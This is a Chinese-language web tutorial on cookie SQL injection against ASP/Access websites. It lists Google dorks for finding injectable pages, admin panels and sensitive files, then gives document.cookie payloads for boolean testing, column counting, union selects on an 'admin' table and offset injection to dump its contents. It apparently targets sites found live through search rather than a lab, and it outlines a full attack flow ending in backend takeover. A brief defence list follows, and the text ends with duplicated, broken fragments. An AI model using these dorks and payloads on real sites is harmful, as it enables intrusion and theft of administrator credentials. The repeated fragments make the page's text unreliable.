Cookie注入漏洞分析与实战教学<\/h1>

一、信息收集技术<\/h2>

1. 谷歌语法应用<\/h3>

通过谷歌语法可以高效地发现潜在漏洞目标：<\/p>

# 查找带有ID传参的网站(可发现SQL注入漏洞)
inurl:asp id=xx

# 查找网站后台(可发现弱口令、暴力破解等漏洞)
site:http:\/\/xxxx.com "admin"
site:http:\/\/xx.com intext:管理
site:http:\/\/xx.com inurl:login
site:http:\/\/xx.com intitle:后台

# 查看上传漏洞
site:http:\/\/xx.com inurl:file
site:http:\/\/xx.com inurl:load

# 查找敏感文件
filetype:mdb|doc|xlsx|pdf
<\/code><\/pre>
二、Cookie注入原理<\/h2>
1. 基本概念<\/h3>

Cookie作用<\/strong>：相当于访问者的身份证<\/li>
漏洞原理<\/strong>：后端PHP代码使用$_REQUEST[]<\/code>获取Cookie值，网站将Cookie传参与原有SQL语句拼接后传入数据库<\/li>
适用环境<\/strong>：主要存在于ASP网站和低版本PHP中<\/li>
数据库特点<\/strong>：ASP常用Access数据库<\/li>
<\/ul>
2. Access数据库特点<\/h3>

具有强大的数据处理和统计分析能力<\/li>
无库名概念<\/li>
查询语法严谨：必须使用select 字段 from 表名<\/code>格式<\/li>
表名验证：exists(select*from 表名)<\/code>可验证表名是否存在<\/li>
<\/ul>
三、Cookie修改方法<\/h2>

Burp Suite抓包修改<\/strong><\/li>
浏览器插件修改<\/strong>（需自行编码）<\/li>
JavaScript直接设置<\/strong>：
document.cookie<\/span>=<\/span>'id='<\/span>+<\/span>escape<\/span>("注入代码"<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
四、实战演示<\/h2>
1. 信息收集<\/h3>
使用谷歌语法inurl:asp id=xx<\/code>查找带有ID传参的ASP网站，发现多个目标（如id=104的网站）<\/p>
2. SQL注入判断<\/h3>
使用以下JS代码测试注入：<\/p>
document.cookie<\/span>=<\/span>'id='<\/span>+<\/span>escape<\/span>("104 and 1=1"<\/span>)
<\/span><\/span>document.cookie<\/span>=<\/span>'id='<\/span>+<\/span>escape<\/span>("104 and 1=2"<\/span>)
<\/span><\/span><\/code><\/pre>
1=1时页面正常显示<\/li>
1=2时网站报错<\/li>
确认存在SQL注入漏洞<\/li>
<\/ul>
3. 查找字段数<\/h3>
document.cookie<\/span>=<\/span>'id='<\/span>+<\/span>escape<\/span>("104 order by 10"<\/span>)
<\/span><\/span><\/code><\/pre>确认字段数为10<\/p>
4. 爆破表名<\/h3>
使用Burp爆破表名（Access数据库无库名）：<\/p>
document.cookie<\/span>=<\/span>'id='<\/span>+<\/span>escape<\/span>("104 union select 1,2,3,4,5,6,7,8,9,10 from admin"<\/span>)
<\/span><\/span><\/code><\/pre>
确认存在admin表<\/li>
回显点为2和5<\/li>
<\/ul>
5. 偏移注入获取数据<\/h3>
使用偏移注入查看admin表字段数并显示内容：<\/p>
document.cookie<\/span>=<\/span>'id='<\/span>+<\/span>escape<\/span>("104 union select 1,2,3,4,5,6,7,admin.* from admin"<\/span>)
<\/span><\/span>document.cookie<\/span>=<\/span>'id='<\/span>+<\/span>escape<\/span>("104 union select 1,2,3,admin.*,7,8,9,10 from admin"<\/span>)
<\/span><\/span><\/code><\/pre>五、完整攻击流程总结<\/h2>

使用谷歌语法找到注入点<\/li>
判断注入是否存在<\/li>
通过Cookie绕过注入防护<\/li>
爆破表名（Access数据库）<\/li>
使用偏移注入查找表的字段数<\/li>
爆破目录查找登录框，进入后台进一步渗透获取权限<\/li>
<\/ol>
六、防御建议<\/h2>

对Cookie值进行严格过滤和转义<\/li>
使用参数化查询而非字符串拼接<\/li>
升级PHP版本（高版本PHP已修复此问题）<\/li>
限制数据库用户权限<\/li>
对错误信息进行适当处理，避免泄露敏感信息<\/li>
<\/ol>

Cookie注入漏洞分析与实战教学<\/h1>

一、信息收集技术<\/h2>

二、Cookie注入原理<\/h2>

四、实战演示<\/h2>

1. 信息收集<\/h3> 使用谷歌语法inurl:asp id=xx<\/code>查找带有ID传参的ASP网站，发现多个目标（如id=104的网站）<\/p>

六、防御建议<\/h2> 对Cookie值进行严格过滤和转义<\/li> 使用参数化查询而非字符串拼接<\/li> 升级PHP版本（高版本PHP已修复此问题）<\/li> 限制数据库用户权限<\/li> 对错误信息进行适当处理，避免泄露敏感信息<\/li> <\/ol>

1. 信息收集<\/h3>
使用谷歌语法`inurl:asp id=xx<\/code>查找带有ID传参的ASP网站，发现多个目标（如id=104的网站）<\/p>`

六、防御建议<\/h2>

对Cookie值进行严格过滤和转义<\/li>
使用参数化查询而非字符串拼接<\/li>
升级PHP版本（高版本PHP已修复此问题）<\/li>
限制数据库用户权限<\/li>
对错误信息进行适当处理，避免泄露敏感信息<\/li> <\/ol>